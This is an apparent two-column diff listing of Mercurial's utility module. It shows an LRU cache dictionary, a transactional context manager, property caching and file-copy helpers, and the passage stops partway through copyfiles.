1154 class cowsortdict(cow, sortdict):
1155 """copy-on-write sortdict
1155 """copy-on-write sortdict
1156
1156
1157 Be sure to call d = d.preparewrite() before writing to d.
1157 Be sure to call d = d.preparewrite() before writing to d.
1158 """
1158 """
1159
1159
1160 class transactional(object):
1160 class transactional(object):
1161 """Base class for making a transactional type into a context manager."""
1161 """Base class for making a transactional type into a context manager."""
1162 __metaclass__ = abc.ABCMeta
1162 __metaclass__ = abc.ABCMeta
1163
1163
1164 @abc.abstractmethod
1164 @abc.abstractmethod
1165 def close(self):
1165 def close(self):
1166 """Successfully closes the transaction."""
1166 """Successfully closes the transaction."""
1167
1167
1168 @abc.abstractmethod
1168 @abc.abstractmethod
1169 def release(self):
1169 def release(self):
1170 """Marks the end of the transaction.
1170 """Marks the end of the transaction.
1171
1171
1172 If the transaction has not been closed, it will be aborted.
1172 If the transaction has not been closed, it will be aborted.
1173 """
1173 """
1174
1174
1175 def __enter__(self):
1175 def __enter__(self):
1176 return self
1176 return self
1177
1177
1178 def __exit__(self, exc_type, exc_val, exc_tb):
1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 try:
1179 try:
1180 if exc_type is None:
1180 if exc_type is None:
1181 self.close()
1181 self.close()
1182 finally:
1182 finally:
1183 self.release()
1183 self.release()
1184
1184
1185 @contextlib.contextmanager
1185 @contextlib.contextmanager
1186 def acceptintervention(tr=None):
1186 def acceptintervention(tr=None):
1187 """A context manager that closes the transaction on InterventionRequired
1187 """A context manager that closes the transaction on InterventionRequired
1188
1188
1189 If no transaction was provided, this simply runs the body and returns
1189 If no transaction was provided, this simply runs the body and returns
1190 """
1190 """
1191 if not tr:
1191 if not tr:
1192 yield
1192 yield
1193 return
1193 return
1194 try:
1194 try:
1195 yield
1195 yield
1196 tr.close()
1196 tr.close()
1197 except error.InterventionRequired:
1197 except error.InterventionRequired:
1198 tr.close()
1198 tr.close()
1199 raise
1199 raise
1200 finally:
1200 finally:
1201 tr.release()
1201 tr.release()
1202
1202
1203 @contextlib.contextmanager
1203 @contextlib.contextmanager
1204 def nullcontextmanager():
1204 def nullcontextmanager():
1205 yield
1205 yield
1206
1206
1207 class _lrucachenode(object):
1207 class _lrucachenode(object):
1208 """A node in a doubly linked list.
1208 """A node in a doubly linked list.
1209
1209
1210 Holds a reference to nodes on either side as well as a key-value
1210 Holds a reference to nodes on either side as well as a key-value
1211 pair for the dictionary entry.
1211 pair for the dictionary entry.
1212 """
1212 """
1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214
1214
1215 def __init__(self):
1215 def __init__(self):
1216 self.next = None
1216 self.next = None
1217 self.prev = None
1217 self.prev = None
1218
1218
1219 self.key = _notset
1219 self.key = _notset
1220 self.value = None
1220 self.value = None
1221 self.cost = 0
1221 self.cost = 0
1222
1222
1223 def markempty(self):
1223 def markempty(self):
1224 """Mark the node as emptied."""
1224 """Mark the node as emptied."""
1225 self.key = _notset
1225 self.key = _notset
1226 self.value = None
1226 self.value = None
1227 self.cost = 0
1227 self.cost = 0
1228
1228
1229 class lrucachedict(object):
1229 class lrucachedict(object):
1230 """Dict that caches most recent accesses and sets.
1230 """Dict that caches most recent accesses and sets.
1231
1231
1232 The dict consists of an actual backing dict - indexed by original
1232 The dict consists of an actual backing dict - indexed by original
1233 key - and a doubly linked circular list defining the order of entries in
1233 key - and a doubly linked circular list defining the order of entries in
1234 the cache.
1234 the cache.
1235
1235
1236 The head node is the newest entry in the cache. If the cache is full,
1236 The head node is the newest entry in the cache. If the cache is full,
1237 we recycle head.prev and make it the new head. Cache accesses result in
1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 the node being moved to before the existing head and being marked as the
1238 the node being moved to before the existing head and being marked as the
1239 new head node.
1239 new head node.
1240
1240
1241 Items in the cache can be inserted with an optional "cost" value. This is
1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 simply an integer that is specified by the caller. The cache can be queried
1242 simply an integer that is specified by the caller. The cache can be queried
1243 for the total cost of all items presently in the cache.
1243 for the total cost of all items presently in the cache.
1244
1244
1245 The cache can also define a maximum cost. If a cache insertion would
1245 The cache can also define a maximum cost. If a cache insertion would
1246 cause the total cost of the cache to go beyond the maximum cost limit,
1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 nodes will be evicted to make room for the new code. This can be used
1247 nodes will be evicted to make room for the new code. This can be used
1248 to e.g. set a max memory limit and associate an estimated bytes size
1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 cost to each item in the cache. By default, no maximum cost is enforced.
1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 """
1250 """
1251 def __init__(self, max, maxcost=0):
1251 def __init__(self, max, maxcost=0):
1252 self._cache = {}
1252 self._cache = {}
1253
1253
1254 self._head = head = _lrucachenode()
1254 self._head = head = _lrucachenode()
1255 head.prev = head
1255 head.prev = head
1256 head.next = head
1256 head.next = head
1257 self._size = 1
1257 self._size = 1
1258 self.capacity = max
1258 self.capacity = max
1259 self.totalcost = 0
1259 self.totalcost = 0
1260 self.maxcost = maxcost
1260 self.maxcost = maxcost
1261
1261
1262 def __len__(self):
1262 def __len__(self):
1263 return len(self._cache)
1263 return len(self._cache)
1264
1264
1265 def __contains__(self, k):
1265 def __contains__(self, k):
1266 return k in self._cache
1266 return k in self._cache
1267
1267
1268 def __iter__(self):
1268 def __iter__(self):
1269 # We don't have to iterate in cache order, but why not.
1269 # We don't have to iterate in cache order, but why not.
1270 n = self._head
1270 n = self._head
1271 for i in range(len(self._cache)):
1271 for i in range(len(self._cache)):
1272 yield n.key
1272 yield n.key
1273 n = n.next
1273 n = n.next
1274
1274
1275 def __getitem__(self, k):
1275 def __getitem__(self, k):
1276 node = self._cache[k]
1276 node = self._cache[k]
1277 self._movetohead(node)
1277 self._movetohead(node)
1278 return node.value
1278 return node.value
1279
1279
1280 def insert(self, k, v, cost=0):
1280 def insert(self, k, v, cost=0):
1281 """Insert a new item in the cache with optional cost value."""
1281 """Insert a new item in the cache with optional cost value."""
1282 node = self._cache.get(k)
1282 node = self._cache.get(k)
1283 # Replace existing value and mark as newest.
1283 # Replace existing value and mark as newest.
1284 if node is not None:
1284 if node is not None:
1285 self.totalcost -= node.cost
1285 self.totalcost -= node.cost
1286 node.value = v
1286 node.value = v
1287 node.cost = cost
1287 node.cost = cost
1288 self.totalcost += cost
1288 self.totalcost += cost
1289 self._movetohead(node)
1289 self._movetohead(node)
1290
1290
1291 if self.maxcost:
1291 if self.maxcost:
1292 self._enforcecostlimit()
1292 self._enforcecostlimit()
1293
1293
1294 return
1294 return
1295
1295
1296 if self._size < self.capacity:
1296 if self._size < self.capacity:
1297 node = self._addcapacity()
1297 node = self._addcapacity()
1298 else:
1298 else:
1299 # Grab the last/oldest item.
1299 # Grab the last/oldest item.
1300 node = self._head.prev
1300 node = self._head.prev
1301
1301
1302 # At capacity. Kill the old entry.
1302 # At capacity. Kill the old entry.
1303 if node.key is not _notset:
1303 if node.key is not _notset:
1304 self.totalcost -= node.cost
1304 self.totalcost -= node.cost
1305 del self._cache[node.key]
1305 del self._cache[node.key]
1306
1306
1307 node.key = k
1307 node.key = k
1308 node.value = v
1308 node.value = v
1309 node.cost = cost
1309 node.cost = cost
1310 self.totalcost += cost
1310 self.totalcost += cost
1311 self._cache[k] = node
1311 self._cache[k] = node
1312 # And mark it as newest entry. No need to adjust order since it
1312 # And mark it as newest entry. No need to adjust order since it
1313 # is already self._head.prev.
1313 # is already self._head.prev.
1314 self._head = node
1314 self._head = node
1315
1315
1316 if self.maxcost:
1316 if self.maxcost:
1317 self._enforcecostlimit()
1317 self._enforcecostlimit()
1318
1318
1319 def __setitem__(self, k, v):
1319 def __setitem__(self, k, v):
1320 self.insert(k, v)
1320 self.insert(k, v)
1321
1321
1322 def __delitem__(self, k):
1322 def __delitem__(self, k):
1323 node = self._cache.pop(k)
1323 node = self._cache.pop(k)
1324 self.totalcost -= node.cost
1324 self.totalcost -= node.cost
1325 node.markempty()
1325 node.markempty()
1326
1326
1327 # Temporarily mark as newest item before re-adjusting head to make
1327 # Temporarily mark as newest item before re-adjusting head to make
1328 # this node the oldest item.
1328 # this node the oldest item.
1329 self._movetohead(node)
1329 self._movetohead(node)
1330 self._head = node.next
1330 self._head = node.next
1331
1331
1332 # Additional dict methods.
1332 # Additional dict methods.
1333
1333
1334 def get(self, k, default=None):
1334 def get(self, k, default=None):
1335 try:
1335 try:
1336 return self.__getitem__(k)
1336 return self.__getitem__(k)
1337 except KeyError:
1337 except KeyError:
1338 return default
1338 return default
1339
1339
1340 def clear(self):
1340 def clear(self):
1341 n = self._head
1341 n = self._head
1342 while n.key is not _notset:
1342 while n.key is not _notset:
1343 self.totalcost -= n.cost
1343 self.totalcost -= n.cost
1344 n.markempty()
1344 n.markempty()
1345 n = n.next
1345 n = n.next
1346
1346
1347 self._cache.clear()
1347 self._cache.clear()
1348
1348
1349 def copy(self, capacity=None, maxcost=0):
1349 def copy(self, capacity=None, maxcost=0):
1350 """Create a new cache as a copy of the current one.
1350 """Create a new cache as a copy of the current one.
1351
1351
1352 By default, the new cache has the same capacity as the existing one.
1352 By default, the new cache has the same capacity as the existing one.
1353 But, the cache capacity can be changed as part of performing the
1353 But, the cache capacity can be changed as part of performing the
1354 copy.
1354 copy.
1355
1355
1356 Items in the copy have an insertion/access order matching this
1356 Items in the copy have an insertion/access order matching this
1357 instance.
1357 instance.
1358 """
1358 """
1359
1359
1360 capacity = capacity or self.capacity
1360 capacity = capacity or self.capacity
1361 maxcost = maxcost or self.maxcost
1361 maxcost = maxcost or self.maxcost
1362 result = lrucachedict(capacity, maxcost=maxcost)
1362 result = lrucachedict(capacity, maxcost=maxcost)
1363
1363
1364 # We copy entries by iterating in oldest-to-newest order so the copy
1364 # We copy entries by iterating in oldest-to-newest order so the copy
1365 # has the correct ordering.
1365 # has the correct ordering.
1366
1366
1367 # Find the first non-empty entry.
1367 # Find the first non-empty entry.
1368 n = self._head.prev
1368 n = self._head.prev
1369 while n.key is _notset and n is not self._head:
1369 while n.key is _notset and n is not self._head:
1370 n = n.prev
1370 n = n.prev
1371
1371
1372 # We could potentially skip the first N items when decreasing capacity.
1372 # We could potentially skip the first N items when decreasing capacity.
1373 # But let's keep it simple unless it is a performance problem.
1373 # But let's keep it simple unless it is a performance problem.
1374 for i in range(len(self._cache)):
1374 for i in range(len(self._cache)):
1375 result.insert(n.key, n.value, cost=n.cost)
1375 result.insert(n.key, n.value, cost=n.cost)
1376 n = n.prev
1376 n = n.prev
1377
1377
1378 return result
1378 return result
1379
1379
1380 def popoldest(self):
1380 def popoldest(self):
1381 """Remove the oldest item from the cache.
1381 """Remove the oldest item from the cache.
1382
1382
1383 Returns the (key, value) describing the removed cache entry.
1383 Returns the (key, value) describing the removed cache entry.
1384 """
1384 """
1385 if not self._cache:
1385 if not self._cache:
1386 return
1386 return
1387
1387
1388 # Walk the linked list backwards starting at tail node until we hit
1388 # Walk the linked list backwards starting at tail node until we hit
1389 # a non-empty node.
1389 # a non-empty node.
1390 n = self._head.prev
1390 n = self._head.prev
1391 while n.key is _notset:
1391 while n.key is _notset:
1392 n = n.prev
1392 n = n.prev
1393
1393
1394 key, value = n.key, n.value
1394 key, value = n.key, n.value
1395
1395
1396 # And remove it from the cache and mark it as empty.
1396 # And remove it from the cache and mark it as empty.
1397 del self._cache[n.key]
1397 del self._cache[n.key]
1398 self.totalcost -= n.cost
1398 self.totalcost -= n.cost
1399 n.markempty()
1399 n.markempty()
1400
1400
1401 return key, value
1401 return key, value
1402
1402
1403 def _movetohead(self, node):
1403 def _movetohead(self, node):
1404 """Mark a node as the newest, making it the new head.
1404 """Mark a node as the newest, making it the new head.
1405
1405
1406 When a node is accessed, it becomes the freshest entry in the LRU
1406 When a node is accessed, it becomes the freshest entry in the LRU
1407 list, which is denoted by self._head.
1407 list, which is denoted by self._head.
1408
1408
1409 Visually, let's make ``N`` the new head node (* denotes head):
1409 Visually, let's make ``N`` the new head node (* denotes head):
1410
1410
1411 previous/oldest <-> head <-> next/next newest
1411 previous/oldest <-> head <-> next/next newest
1412
1412
1413 ----<->--- A* ---<->-----
1413 ----<->--- A* ---<->-----
1414 | |
1414 | |
1415 E <-> D <-> N <-> C <-> B
1415 E <-> D <-> N <-> C <-> B
1416
1416
1417 To:
1417 To:
1418
1418
1419 ----<->--- N* ---<->-----
1419 ----<->--- N* ---<->-----
1420 | |
1420 | |
1421 E <-> D <-> C <-> B <-> A
1421 E <-> D <-> C <-> B <-> A
1422
1422
1423 This requires the following moves:
1423 This requires the following moves:
1424
1424
1425 C.next = D (node.prev.next = node.next)
1425 C.next = D (node.prev.next = node.next)
1426 D.prev = C (node.next.prev = node.prev)
1426 D.prev = C (node.next.prev = node.prev)
1427 E.next = N (head.prev.next = node)
1427 E.next = N (head.prev.next = node)
1428 N.prev = E (node.prev = head.prev)
1428 N.prev = E (node.prev = head.prev)
1429 N.next = A (node.next = head)
1429 N.next = A (node.next = head)
1430 A.prev = N (head.prev = node)
1430 A.prev = N (head.prev = node)
1431 """
1431 """
1432 head = self._head
1432 head = self._head
1433 # C.next = D
1433 # C.next = D
1434 node.prev.next = node.next
1434 node.prev.next = node.next
1435 # D.prev = C
1435 # D.prev = C
1436 node.next.prev = node.prev
1436 node.next.prev = node.prev
1437 # N.prev = E
1437 # N.prev = E
1438 node.prev = head.prev
1438 node.prev = head.prev
1439 # N.next = A
1439 # N.next = A
1440 # It is tempting to do just "head" here, however if node is
1440 # It is tempting to do just "head" here, however if node is
1441 # adjacent to head, this will do bad things.
1441 # adjacent to head, this will do bad things.
1442 node.next = head.prev.next
1442 node.next = head.prev.next
1443 # E.next = N
1443 # E.next = N
1444 node.next.prev = node
1444 node.next.prev = node
1445 # A.prev = N
1445 # A.prev = N
1446 node.prev.next = node
1446 node.prev.next = node
1447
1447
1448 self._head = node
1448 self._head = node
1449
1449
1450 def _addcapacity(self):
1450 def _addcapacity(self):
1451 """Add a node to the circular linked list.
1451 """Add a node to the circular linked list.
1452
1452
1453 The new node is inserted before the head node.
1453 The new node is inserted before the head node.
1454 """
1454 """
1455 head = self._head
1455 head = self._head
1456 node = _lrucachenode()
1456 node = _lrucachenode()
1457 head.prev.next = node
1457 head.prev.next = node
1458 node.prev = head.prev
1458 node.prev = head.prev
1459 node.next = head
1459 node.next = head
1460 head.prev = node
1460 head.prev = node
1461 self._size += 1
1461 self._size += 1
1462 return node
1462 return node
1463
1463
1464 def _enforcecostlimit(self):
1464 def _enforcecostlimit(self):
1465 # This should run after an insertion. It should only be called if total
1465 # This should run after an insertion. It should only be called if total
1466 # cost limits are being enforced.
1466 # cost limits are being enforced.
1467 # The most recently inserted node is never evicted.
1467 # The most recently inserted node is never evicted.
1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 return
1469 return
1470
1470
1471 # This is logically equivalent to calling popoldest() until we
1471 # This is logically equivalent to calling popoldest() until we
1472 # free up enough cost. We don't do that since popoldest() needs
1472 # free up enough cost. We don't do that since popoldest() needs
1473 # to walk the linked list and doing this in a loop would be
1473 # to walk the linked list and doing this in a loop would be
1474 # quadratic. So we find the first non-empty node and then
1474 # quadratic. So we find the first non-empty node and then
1475 # walk nodes until we free up enough capacity.
1475 # walk nodes until we free up enough capacity.
1476 #
1476 #
1477 # If we only removed the minimum number of nodes to free enough
1477 # If we only removed the minimum number of nodes to free enough
1478 # cost at insert time, chances are high that the next insert would
1478 # cost at insert time, chances are high that the next insert would
1479 # also require pruning. This would effectively constitute quadratic
1479 # also require pruning. This would effectively constitute quadratic
1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 # target cost that is a percentage of the max cost. This will tend
1481 # target cost that is a percentage of the max cost. This will tend
1482 # to free more nodes when the high water mark is reached, which
1482 # to free more nodes when the high water mark is reached, which
1483 # lowers the chances of needing to prune on the subsequent insert.
1483 # lowers the chances of needing to prune on the subsequent insert.
1484 targetcost = int(self.maxcost * 0.75)
1484 targetcost = int(self.maxcost * 0.75)
1485
1485
1486 n = self._head.prev
1486 n = self._head.prev
1487 while n.key is _notset:
1487 while n.key is _notset:
1488 n = n.prev
1488 n = n.prev
1489
1489
1490 while len(self) > 1 and self.totalcost > targetcost:
1490 while len(self) > 1 and self.totalcost > targetcost:
1491 del self._cache[n.key]
1491 del self._cache[n.key]
1492 self.totalcost -= n.cost
1492 self.totalcost -= n.cost
1493 n.markempty()
1493 n.markempty()
1494 n = n.prev
1494 n = n.prev
1495
1495
1496 def lrucachefunc(func):
1496 def lrucachefunc(func):
1497 '''cache most recent results of function calls'''
1497 '''cache most recent results of function calls'''
1498 cache = {}
1498 cache = {}
1499 order = collections.deque()
1499 order = collections.deque()
1500 if func.__code__.co_argcount == 1:
1500 if func.__code__.co_argcount == 1:
1501 def f(arg):
1501 def f(arg):
1502 if arg not in cache:
1502 if arg not in cache:
1503 if len(cache) > 20:
1503 if len(cache) > 20:
1504 del cache[order.popleft()]
1504 del cache[order.popleft()]
1505 cache[arg] = func(arg)
1505 cache[arg] = func(arg)
1506 else:
1506 else:
1507 order.remove(arg)
1507 order.remove(arg)
1508 order.append(arg)
1508 order.append(arg)
1509 return cache[arg]
1509 return cache[arg]
1510 else:
1510 else:
1511 def f(*args):
1511 def f(*args):
1512 if args not in cache:
1512 if args not in cache:
1513 if len(cache) > 20:
1513 if len(cache) > 20:
1514 del cache[order.popleft()]
1514 del cache[order.popleft()]
1515 cache[args] = func(*args)
1515 cache[args] = func(*args)
1516 else:
1516 else:
1517 order.remove(args)
1517 order.remove(args)
1518 order.append(args)
1518 order.append(args)
1519 return cache[args]
1519 return cache[args]
1520
1520
1521 return f
1521 return f
1522
1522
1523 class propertycache(object):
1523 class propertycache(object):
1524 def __init__(self, func):
1524 def __init__(self, func):
1525 self.func = func
1525 self.func = func
1526 self.name = func.__name__
1526 self.name = func.__name__
1527 def __get__(self, obj, type=None):
1527 def __get__(self, obj, type=None):
1528 result = self.func(obj)
1528 result = self.func(obj)
1529 self.cachevalue(obj, result)
1529 self.cachevalue(obj, result)
1530 return result
1530 return result
1531
1531
1532 def cachevalue(self, obj, value):
1532 def cachevalue(self, obj, value):
1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 obj.__dict__[self.name] = value
1534 obj.__dict__[self.name] = value
1535
1535
1536 def clearcachedproperty(obj, prop):
1536 def clearcachedproperty(obj, prop):
1537 '''clear a cached property value, if one has been set'''
1537 '''clear a cached property value, if one has been set'''
1538 if prop in obj.__dict__:
1538 if prop in obj.__dict__:
1539 del obj.__dict__[prop]
1539 del obj.__dict__[prop]
1540
1540
1541 def increasingchunks(source, min=1024, max=65536):
1541 def increasingchunks(source, min=1024, max=65536):
1542 '''return no less than min bytes per chunk while data remains,
1542 '''return no less than min bytes per chunk while data remains,
1543 doubling min after each chunk until it reaches max'''
1543 doubling min after each chunk until it reaches max'''
1544 def log2(x):
1544 def log2(x):
1545 if not x:
1545 if not x:
1546 return 0
1546 return 0
1547 i = 0
1547 i = 0
1548 while x:
1548 while x:
1549 x >>= 1
1549 x >>= 1
1550 i += 1
1550 i += 1
1551 return i - 1
1551 return i - 1
1552
1552
1553 buf = []
1553 buf = []
1554 blen = 0
1554 blen = 0
1555 for chunk in source:
1555 for chunk in source:
1556 buf.append(chunk)
1556 buf.append(chunk)
1557 blen += len(chunk)
1557 blen += len(chunk)
1558 if blen >= min:
1558 if blen >= min:
1559 if min < max:
1559 if min < max:
1560 min = min << 1
1560 min = min << 1
1561 nmin = 1 << log2(blen)
1561 nmin = 1 << log2(blen)
1562 if nmin > min:
1562 if nmin > min:
1563 min = nmin
1563 min = nmin
1564 if min > max:
1564 if min > max:
1565 min = max
1565 min = max
1566 yield ''.join(buf)
1566 yield ''.join(buf)
1567 blen = 0
1567 blen = 0
1568 buf = []
1568 buf = []
1569 if buf:
1569 if buf:
1570 yield ''.join(buf)
1570 yield ''.join(buf)
1571
1571
1572 def always(fn):
1572 def always(fn):
1573 return True
1573 return True
1574
1574
1575 def never(fn):
1575 def never(fn):
1576 return False
1576 return False
1577
1577
1578 def nogc(func):
1578 def nogc(func):
1579 """disable garbage collector
1579 """disable garbage collector
1580
1580
1581 Python's garbage collector triggers a GC each time a certain number of
1581 Python's garbage collector triggers a GC each time a certain number of
1582 container objects (the number being defined by gc.get_threshold()) are
1582 container objects (the number being defined by gc.get_threshold()) are
1583 allocated even when marked not to be tracked by the collector. Tracking has
1583 allocated even when marked not to be tracked by the collector. Tracking has
1584 no effect on when GCs are triggered, only on what objects the GC looks
1584 no effect on when GCs are triggered, only on what objects the GC looks
1585 into. As a workaround, disable GC while building complex (huge)
1585 into. As a workaround, disable GC while building complex (huge)
1586 containers.
1586 containers.
1587
1587
1588 This garbage collector issue have been fixed in 2.7. But it still affect
1588 This garbage collector issue have been fixed in 2.7. But it still affect
1589 CPython's performance.
1589 CPython's performance.
1590 """
1590 """
1591 def wrapper(*args, **kwargs):
1591 def wrapper(*args, **kwargs):
1592 gcenabled = gc.isenabled()
1592 gcenabled = gc.isenabled()
1593 gc.disable()
1593 gc.disable()
1594 try:
1594 try:
1595 return func(*args, **kwargs)
1595 return func(*args, **kwargs)
1596 finally:
1596 finally:
1597 if gcenabled:
1597 if gcenabled:
1598 gc.enable()
1598 gc.enable()
1599 return wrapper
1599 return wrapper
1600
1600
1601 if pycompat.ispypy:
1601 if pycompat.ispypy:
1602 # PyPy runs slower with gc disabled
1602 # PyPy runs slower with gc disabled
1603 nogc = lambda x: x
1603 nogc = lambda x: x
1604
1604
1605 def pathto(root, n1, n2):
1605 def pathto(root, n1, n2):
1606 '''return the relative path from one place to another.
1606 '''return the relative path from one place to another.
1607 root should use os.sep to separate directories
1607 root should use os.sep to separate directories
1608 n1 should use os.sep to separate directories
1608 n1 should use os.sep to separate directories
1609 n2 should use "/" to separate directories
1609 n2 should use "/" to separate directories
1610 returns an os.sep-separated path.
1610 returns an os.sep-separated path.
1611
1611
1612 If n1 is a relative path, it's assumed it's
1612 If n1 is a relative path, it's assumed it's
1613 relative to root.
1613 relative to root.
1614 n2 should always be relative to root.
1614 n2 should always be relative to root.
1615 '''
1615 '''
1616 if not n1:
1616 if not n1:
1617 return localpath(n2)
1617 return localpath(n2)
1618 if os.path.isabs(n1):
1618 if os.path.isabs(n1):
1619 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1619 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 return os.path.join(root, localpath(n2))
1620 return os.path.join(root, localpath(n2))
1621 n2 = '/'.join((pconvert(root), n2))
1621 n2 = '/'.join((pconvert(root), n2))
1622 a, b = splitpath(n1), n2.split('/')
1622 a, b = splitpath(n1), n2.split('/')
1623 a.reverse()
1623 a.reverse()
1624 b.reverse()
1624 b.reverse()
1625 while a and b and a[-1] == b[-1]:
1625 while a and b and a[-1] == b[-1]:
1626 a.pop()
1626 a.pop()
1627 b.pop()
1627 b.pop()
1628 b.reverse()
1628 b.reverse()
1629 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1629 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630
1630
1631 # the location of data files matching the source code
1631 # the location of data files matching the source code
1632 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1632 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 # executable version (py2exe) doesn't support __file__
1633 # executable version (py2exe) doesn't support __file__
1634 datapath = os.path.dirname(pycompat.sysexecutable)
1634 datapath = os.path.dirname(pycompat.sysexecutable)
1635 else:
1635 else:
1636 datapath = os.path.dirname(pycompat.fsencode(__file__))
1636 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637
1637
1638 i18n.setdatapath(datapath)
1638 i18n.setdatapath(datapath)
1639
1639
1640 def checksignature(func):
1640 def checksignature(func):
1641 '''wrap a function with code to check for calling errors'''
1641 '''wrap a function with code to check for calling errors'''
1642 def check(*args, **kwargs):
1642 def check(*args, **kwargs):
1643 try:
1643 try:
1644 return func(*args, **kwargs)
1644 return func(*args, **kwargs)
1645 except TypeError:
1645 except TypeError:
1646 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1646 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 raise error.SignatureError
1647 raise error.SignatureError
1648 raise
1648 raise
1649
1649
1650 return check
1650 return check
1651
1651
1652 # a whilelist of known filesystems where hardlink works reliably
1652 # a whilelist of known filesystems where hardlink works reliably
1653 _hardlinkfswhitelist = {
1653 _hardlinkfswhitelist = {
1654 'apfs',
1654 'apfs',
1655 'btrfs',
1655 'btrfs',
1656 'ext2',
1656 'ext2',
1657 'ext3',
1657 'ext3',
1658 'ext4',
1658 'ext4',
1659 'hfs',
1659 'hfs',
1660 'jfs',
1660 'jfs',
1661 'NTFS',
1661 'NTFS',
1662 'reiserfs',
1662 'reiserfs',
1663 'tmpfs',
1663 'tmpfs',
1664 'ufs',
1664 'ufs',
1665 'xfs',
1665 'xfs',
1666 'zfs',
1666 'zfs',
1667 }
1667 }
1668
1668
1669 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1669 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 '''copy a file, preserving mode and optionally other stat info like
1670 '''copy a file, preserving mode and optionally other stat info like
1671 atime/mtime
1671 atime/mtime
1672
1672
1673 checkambig argument is used with filestat, and is useful only if
1673 checkambig argument is used with filestat, and is useful only if
1674 destination file is guarded by any lock (e.g. repo.lock or
1674 destination file is guarded by any lock (e.g. repo.lock or
1675 repo.wlock).
1675 repo.wlock).
1676
1676
1677 copystat and checkambig should be exclusive.
1677 copystat and checkambig should be exclusive.
1678 '''
1678 '''
1679 assert not (copystat and checkambig)
1679 assert not (copystat and checkambig)
1680 oldstat = None
1680 oldstat = None
1681 if os.path.lexists(dest):
1681 if os.path.lexists(dest):
1682 if checkambig:
1682 if checkambig:
1683 oldstat = checkambig and filestat.frompath(dest)
1683 oldstat = checkambig and filestat.frompath(dest)
1684 unlink(dest)
1684 unlink(dest)
1685 if hardlink:
1685 if hardlink:
1686 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1686 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 # unless we are confident that dest is on a whitelisted filesystem.
1687 # unless we are confident that dest is on a whitelisted filesystem.
1688 try:
1688 try:
1689 fstype = getfstype(os.path.dirname(dest))
1689 fstype = getfstype(os.path.dirname(dest))
1690 except OSError:
1690 except OSError:
1691 fstype = None
1691 fstype = None
1692 if fstype not in _hardlinkfswhitelist:
1692 if fstype not in _hardlinkfswhitelist:
1693 hardlink = False
1693 hardlink = False
1694 if hardlink:
1694 if hardlink:
1695 try:
1695 try:
1696 oslink(src, dest)
1696 oslink(src, dest)
1697 return
1697 return
1698 except (IOError, OSError):
1698 except (IOError, OSError):
1699 pass # fall back to normal copy
1699 pass # fall back to normal copy
1700 if os.path.islink(src):
1700 if os.path.islink(src):
1701 os.symlink(os.readlink(src), dest)
1701 os.symlink(os.readlink(src), dest)
1702 # copytime is ignored for symlinks, but in general copytime isn't needed
1702 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 # for them anyway
1703 # for them anyway
1704 else:
1704 else:
1705 try:
1705 try:
1706 shutil.copyfile(src, dest)
1706 shutil.copyfile(src, dest)
1707 if copystat:
1707 if copystat:
1708 # copystat also copies mode
1708 # copystat also copies mode
1709 shutil.copystat(src, dest)
1709 shutil.copystat(src, dest)
1710 else:
1710 else:
1711 shutil.copymode(src, dest)
1711 shutil.copymode(src, dest)
1712 if oldstat and oldstat.stat:
1712 if oldstat and oldstat.stat:
1713 newstat = filestat.frompath(dest)
1713 newstat = filestat.frompath(dest)
1714 if newstat.isambig(oldstat):
1714 if newstat.isambig(oldstat):
1715 # stat of copied file is ambiguous to original one
1715 # stat of copied file is ambiguous to original one
1716 advanced = (
1716 advanced = (
1717 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1717 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 os.utime(dest, (advanced, advanced))
1718 os.utime(dest, (advanced, advanced))
1719 except shutil.Error as inst:
1719 except shutil.Error as inst:
1720 raise error.Abort(str(inst))
1720 raise error.Abort(str(inst))
1721
1721
1722 def copyfiles(src, dst, hardlink=None, progress=None):
1722 def copyfiles(src, dst, hardlink=None, progress=None):
1723 """Copy a directory tree using hardlinks if possible."""
1723 """Copy a directory tree using hardlinks if possible."""
1724 num = 0
1724 num = 0
1725
1725
1726 def settopic():
1726 def settopic():
1727 if progress:
1727 if progress:
1728 progress.topic = _('linking') if hardlink else _('copying')
1728 progress.topic = _('linking') if hardlink else _('copying')
1729
1729
1730 if os.path.isdir(src):
1730 if os.path.isdir(src):
1731 if hardlink is None:
1731 if hardlink is None:
1732 hardlink = (os.stat(src).st_dev ==
1732 hardlink = (os.stat(src).st_dev ==
1733 os.stat(os.path.dirname(dst)).st_dev)
1733 os.stat(os.path.dirname(dst)).st_dev)
1734 settopic()
1734 settopic()
1735 os.mkdir(dst)
1735 os.mkdir(dst)
1736 for name, kind in listdir(src):
1736 for name, kind in listdir(src):
1737 srcname = os.path.join(src, name)
1737 srcname = os.path.join(src, name)
1738 dstname = os.path.join(dst, name)
1738 dstname = os.path.join(dst, name)
1739 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1739 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 num += n
1740 num += n
1741 else:
1741 else:
1742 if hardlink is None:
1742 if hardlink is None:
